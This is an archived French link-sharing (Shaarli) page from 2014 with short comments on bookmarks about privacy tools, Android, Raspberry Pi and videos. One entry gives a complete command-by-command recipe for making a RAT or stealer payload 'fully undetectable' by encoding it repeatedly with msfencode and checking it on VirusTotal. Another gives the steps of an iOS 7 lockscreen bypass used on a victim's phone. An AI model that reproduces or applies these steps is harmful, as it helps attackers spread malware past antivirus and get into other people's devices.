PROJET AUTOBLOG


Shaarli - Share-Link

Archivé

Site original : Shaarli - Share-Link

⇐ retour index

AttitudesGagnantesV2 par David Laroche - YouTube

vendredi 4 juillet 2014 à 13:17
(Permalink)

Comment avoir de la chance ? - YouTube

vendredi 4 juillet 2014 à 13:14
Intervention de Phillipe Gabilliet, Directeur Directeur Scientifique du European Executive MBA et Professeur de Leadership à ESCP Europe.

+ https://www.youtube.com/results?search_query=mr+gabillet+la+chance
(Permalink)

Autodéfense courriel - un guide pour contrer la surveillance en chiffrant avec GnuPG

mercredi 2 juillet 2014 à 22:50
GNUPG https://gnupg.org/
(Permalink)

7 Things You Should Know About Tor | Electronic Frontier Foundation

mercredi 2 juillet 2014 à 22:48
7 choses à savoir sur TOR!

(Via http://www.sebsauvage.net/links/?CC-JJg)
(Permalink)

Mes appli Android - Le Hollandais Volant

mercredi 2 juillet 2014 à 22:47
Selection d'application par Timo.

1- http://lehollandaisvolant.net/?d=2012/04/15/16/21/45-mes-appli-android
2- http://lehollandaisvolant.net/?d=2014/06/28/17/55/48-selection-dapplications-pour-android-2
(Permalink)

towelroot by geohot

lundi 30 juin 2014 à 11:22
Rooter android en un clic...

KORBEN : http://korben.info/towelroot-rootez-telephone-android-en-clic.html
(Permalink)

Blablacar, le covoiturage tué par la finance et l’appât du gain

jeudi 26 juin 2014 à 23:21
Covoiturage.fr vous la met profond...
(Permalink)

searchcode | source code search engine

jeudi 26 juin 2014 à 18:34
Un moteur de recherche pour du code!

(Via http://www.sebsauvage.net/links/?DxNUNQ)
(Permalink)

Pirate mon amour #DATAGUEULE 5 - YouTube

jeudi 26 juin 2014 à 18:29
Comme quoi...
(Permalink)

Comment le savon lave-t-il ? | Kidi'science

jeudi 26 juin 2014 à 18:27
Intéressant!
(Permalink)

HOWTO FUD a RAT stub with Backtrack

mercredi 25 juin 2014 à 13:19
Requirements:
1. Backtrack Operating System
2. MSF encoders

So, our first step is to create a virus file with any of the tools like RAT, stealers, botnets, payload or anything. To make it FUD (Fully Undetectable), we use backtrack. Before going to FUD check your file with ant viruses at virustotal.com and we get a detection ratio for example lets say 30/44

Now start terminal in Backtrack and navigate to the directory where your file is located.

E.g. cd Desktop

So our first step is to change the permissions of that file (775) by typing this command

root@bt:~/Desktop# chmod 775 stub.exe

Further type this command to encode your virus,

root@bt:~/Desktop# msfencode -i /root/Desktop/Server.exe -t raw -o
/root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10

You’ll notice Antivirus still detected it even though we encoded it 10 times with

“x86/shikata_ga_nai” encoder.

Now again change the permissions of this output file,

root@bt:~/Desktop# chmod 775 server2.exe

Now 2nd time, we use another encoder named as “jmp_call_additive”

root@bt:~/Desktop# msfencode -i /root/Desktop/Server2.exe -t raw -o
/root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1

Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server3.exe

Now again we use another encoder named as “call4_dword_xor”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o
/root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1

Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server4.exe

Now final we encode again with this encoder “shikata_ga_nai”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o
/root/Desktop/final.exe -e x86/shikata_ga_nai -c 1

Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 final.exe

Now you'll get a final.exe, upload it to virustotal.com and you’ll see the results.
(Permalink)

I made my Pi an in-car bluetooth audio receiver : raspberry_pi

mercredi 25 juin 2014 à 13:12
Transformer le Raspberry Pi en récepteur audio/bluetooth!
(Permalink)

Opale - " Sparkles and Wine" (Official Video) - YouTube

lundi 23 juin 2014 à 21:23
La lumière!
(Permalink)

HOWTO : 15 ways to download files from internet | Offensive Security Blog V2.0

lundi 23 juin 2014 à 19:33
Télécharger un fichier dans 15 langages différents.

Source : https://www.netspi.com/blog/entryid/231/15-ways-to-download-a-file
(Permalink)

HOWTO [Astuce] Contourner la restriction d'âge YouTube - Liens en vrac de sebsauvage

dimanche 22 juin 2014 à 18:43
Changez juste dans l'URL "/watch?v=" par "/v/"
Exemple: http://www.youtube.com/watch?v=nje6dcArZrI
changé : http://www.youtube.com/v/nje6dcArZrI

Merci Sebsauvage pour l'astuce!
(Permalink)

Crontab Code Generator

dimanche 22 juin 2014 à 18:40
Pratique!
(Permalink)

PING (Partimage Is Not Ghost)

jeudi 19 juin 2014 à 00:15
Ping permet de faire aussi plein de truc comme créer un disque bootable de récupération, sauvegarder le BIOS, remettre à zéro les mots de passe et.... cloner vos disque.
(Permalink)

SSHFS inversé (rsshfs) – ®om's blog

dimanche 15 juin 2014 à 23:13
Monter un répertoire distant en local :
sshfs serveur:/répertoire/distant /répertoire/local

rsshfs permet de faire l'inverse...
(Permalink)

HOWTO Bypass iOS 7 LockScreen & Access ANY iPhone Application - YouTube

dimanche 15 juin 2014 à 22:31
On iPhone 5S, 5C, 5, 4S & 4 On 7.1.1, 7.1.2, 7.1 & Below. Full access into Applications, NOT just the phone app.
2 Requirement for bypass iOS7 lockscreen
- Miss Call
- Access to Control Panel
1. The victim still open application before close screen.(Work with Messages, LINE, Facebook)
2. After screen was logged, go to airplane mode with Control Panel.
3. Go to miss call screen and click it.
4. Now, you're in the application that you open before logged screen.

INFO : http://www.r00tsec.com/2014/06/howto-how-to-bypass-ios-7-lockscreen.html
(Permalink)

BOILER ROOM’s stream on SoundCloud - Hear the world’s sounds

dimanche 15 juin 2014 à 20:40
(Permalink)